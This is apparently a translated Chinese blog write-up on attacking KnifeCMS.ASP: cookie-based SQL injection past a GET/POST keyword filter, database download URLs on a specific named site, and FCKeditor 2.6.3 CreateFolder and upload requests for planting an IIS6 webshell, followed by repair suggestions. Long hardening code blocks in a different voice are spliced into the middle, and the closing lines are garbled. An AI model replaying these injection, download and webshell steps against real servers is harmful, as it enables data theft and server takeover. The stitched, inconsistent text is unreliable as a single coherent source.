0x00 KnifeCMS overview
0x01 Vulnerable code
0x02 Exploitation process
0x03 Database download
0x04 Getting a WebShell
0x05 Repair suggestions
0x00 KnifeCMS overview
KnifeCMS.ASP is open source under the GPL license.
If you want to modify the source code for other purposes (including commercial use), you only need to inform us of the modifications you made to the source code.
We encourage you to modify the source code.
You do not have to inform us of every change.
However, if you are willing to spend some precious time informing us, we will provide free online technical support!
The development time was too short and some documents are not very detailed. Please forgive me!
0x01 Vulnerable code
/page/doc.asp
<!--#include virtual="/include/conn.asp"-->
<!--#include virtual="/include/function.asp"-->
<!--#include virtual="/include/page.asp"-->
<!--#include virtual="/include/config.asp"-->
<!--#include virtual="/include/template.asp"-->
<%
'If Channel(getCID(ID), "pageMode") = 1 Then Response.Redirect "/page/list.asp?PageID=" & pageID
Dim aTemplate
' Request("ID") is passed to getCID() unvalidated; getCID() builds the SQL lookup from it.
aTemplate = Channel(getCID(Request("ID")), "Template")
If Len(aTemplate) > 0 Then
    ExeTemplate(aTemplate)
Else
    ExeTemplate("doc.shtml")
End If
%>
The program does not filter the value that produces aTemplate (Request("ID"), handed to getCID() and from there to the SQL statement), which leads to an injection vulnerability.
However, the author did add an anti-injection filter in the following include file.
/include/conn.asp
'==========================================================
'SQL injection filtering
'2017-10-25
'==========================================================
Dim QueryData, FormData, QueryName, Name
QueryData = "'|''|;|,|*|%|and|exec|insert|select|update|delete|count|master|truncate|char|declare|where|set|declare|mid|chr|set|chr(37)|net"
FormData = ""

'Filter the GET query-string values.
If Request.QueryString <> "" Then
    adoData = Split(QueryData, "|")
    For Each QueryName In Request.QueryString
        For I = 0 To UBound(adoData)
            If InStr(LCase(Request.QueryString(QueryName)), adoData(I)) <> 0 Then
                Response.Write "<Script Language=javascript>alert('Please do not submit illegal requests!');history.back(-1)</Script>"
                Response.End
            End If
        Next
    Next
End If

'Filter the POST form values.
If Request.Form <> "" Then
    adoData = Split(FormData, "|")
    For Each Name In Request.Form
        For I = 0 To UBound(adoData)
            If InStr(LCase(Request.Form(Name)), adoData(I)) <> 0 Then
                Response.Write "<Script Language=javascript>alert('Please do not submit illegal requests!');history.back(-1)</Script>"
                Response.End
            End If
        Next
    Next
End If
%>
From this anti-injection code we can see that the program checks GET and POST parameters but never checks cookies. In classic ASP, a bare Request("ID") (with no collection name) searches QueryString, then Form, then Cookies, so an ID supplied in a cookie reaches getCID() without passing through this filter at all.
Therefore, the injection is carried out through cookies.
0x02 Exploitation process
-- Find a doc.asp?ID=xx page.
Then throw it into Pangolin for cookie injection (slow), or convert it into a generated cookie with the Hedgehog tool (faster)..
http://www.bkjia.com/page/doc.asp?ID=142
Add table: Db_system
Fields: Username, Password
-- This table is not in the injection tool's built-in table list, so add it manually.
(The figure of the test website is not included here.)
Since there is no md5 member, we will not take a webshell on the official website..
0x03 Database download
http://www.bkjia.com/_database/5d7525e61ca2ae39.mdb
http://www.bkjia.com/bbs/database/bbsxp2008_.mdb
/_database
There are other databases in this directory; presumably the names are meant to defeat other people's scanners..
In other words, this source package also bundles bbsxp2008... If you are interested in the rest, download a copy yourself and see whether the source code is well written. 0.0~
But on the official website there seem to be no default database paths; he has changed the path..
0x04 Getting a WebShell
FCKeditor is written well in this part: it checks whether the admin is logged in before allowing the next operation. 0.0~
FCKeditor version 2.6.3
Here is the webshell for IIS6 + Win2003 (IIS6 environment).
Create an xg.asp directory:
http://www.bkjia.com/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xg.asp&NewFolderName=x.asp
Upload a jpg-format image trojan here:
http://www.bkjia.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.bkjia.com/fckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fasp%2Fconnector.asp
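The check that closes the CreateFolder hole described above, as an added example that is not FCKeditor's own code: IIS 6 executes any file inside a directory whose name ends in .asp, .asa, .cer or .cdx as script, so the connector must refuse folder names containing a dot or a path separator, for NewFolderName and for every segment of CurrentFolder alike. The function names IsSafeFolderName and IsSafeFolderPath are assumptions.

```vbscript
<%
' Added example (not FCKeditor code): reject folder names that IIS 6 would
' treat as script directories (x.asp, x.asa, x.cer, x.cdx) or that could
' escape the user-files root. Only letters, digits, underscore and hyphen pass.
Function IsSafeFolderName(name)
    Dim re
    IsSafeFolderName = False
    If Len(name) = 0 Or Len(name) > 64 Then Exit Function
    If InStr(name, ".") > 0 Or InStr(name, "/") > 0 Or InStr(name, "\") > 0 Then Exit Function
    Set re = New RegExp
    re.Pattern = "^[A-Za-z0-9_\-]+$"
    IsSafeFolderName = re.Test(name)
End Function

' CurrentFolder arrives as a slash-separated path (e.g. /xg.asp in the request
' above); every non-empty segment must pass the same test.
Function IsSafeFolderPath(path)
    Dim parts, i
    IsSafeFolderPath = True
    parts = Split(path, "/")
    For i = 0 To UBound(parts)
        If parts(i) <> "" Then
            If Not IsSafeFolderName(parts(i)) Then IsSafeFolderPath = False
        End If
    Next
End Function

' Typical use at the top of the CreateFolder handler in the ASP connector.
Dim curFolder, newName
curFolder = Request.QueryString("CurrentFolder")
newName = Request.QueryString("NewFolderName")
If Not IsSafeFolderPath(curFolder) Or Not IsSafeFolderName(newName) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid folder name."
    Response.End
End If
%>
```

With this check in place, both /xg.asp as CurrentFolder and x.asp as NewFolderName are rejected before any directory is created; this is the kind of validation that upgrading the connector provides, but it also documents why the upgrade matters.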
0x05 Repair suggestions
1. Filter the aTemplate variable to solve the problem at the root. The code in the other page directories seems to be a bit ..
2. Add a table named <% NoDown %> as the first table in the database; then the database cannot be downloaded even if a scanning tool finds it.
3. Upgrade FCKeditor to the latest patched version 2.66, which no longer allows creating .asp/.asa/.cer ...... directories.
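A hardened version of the doc.asp entry point, as an added example that is not KnifeCMS code, covering both the cookie bypass explained in 0x01 and repair suggestion 1: ID is read only from Request.QueryString (a bare Request("ID") also falls through to Request.Cookies, which conn.asp never checks), it is allowlisted as a short positive integer, and the lookup that getCID() performs is shown as a parameterised ADO command instead of string concatenation, because a keyword blacklist like conn.asp's is not a fix. The table and column names Db_document, DocID and ChannelID, the connection object conn, and the function name SafeGetCID are assumptions.

```vbscript
<%
' Added example (not KnifeCMS code): hardened ID handling for /page/doc.asp.
' 1. Read ID from Request.QueryString only. A bare Request("ID") searches
'    QueryString, Form and then Cookies, so a cookie value would bypass the
'    GET/POST blacklist in conn.asp entirely.
' 2. Allowlist the value: only 1 to 9 decimal digits reach the SQL layer.
Dim rawID, docID, aTemplate, re
rawID = Trim(Request.QueryString("ID"))
Set re = New RegExp
re.Pattern = "^[0-9]{1,9}$"
If Not re.Test(rawID) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid document ID."
    Response.End
End If
docID = CLng(rawID)

' 3. What getCID() should do internally: a parameterised ADO query. The
'    table/column names and the connection object conn are assumed.
Function SafeGetCID(id)
    Dim cmd, rs
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn      ' opened in /include/conn.asp (assumed name)
    cmd.CommandText = "SELECT ChannelID FROM Db_document WHERE DocID = ?"
    cmd.CommandType = 1                  ' adCmdText
    cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , id)   ' adInteger, adParamInput
    Set rs = cmd.Execute
    If rs.EOF Then
        SafeGetCID = 0
    Else
        SafeGetCID = rs("ChannelID")
    End If
    rs.Close
End Function

aTemplate = Channel(SafeGetCID(docID), "Template")
If Len(aTemplate) > 0 Then
    ExeTemplate(aTemplate)
Else
    ExeTemplate("doc.shtml")
End If
%>
```

The same two rules (name the collection explicitly, validate before the query) apply to every other page that reads Request("...") into a getCID()-style lookup.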
Finally,
0.0 Reprinted from mjj without copyright. (I forgot to make the mistake last time; next time I will ask our company's female editor to reprint it, which will make MJJ a reality.)
Welcome to communicate with me..
If there is an error in this article, I hope you can point it out.
[Mix0xrn @ Dis9Team, xiaogao's Blog. Record your learning details.]
[If everything all me do whatever they want, I wowould have get lost the here free abyss feeling.]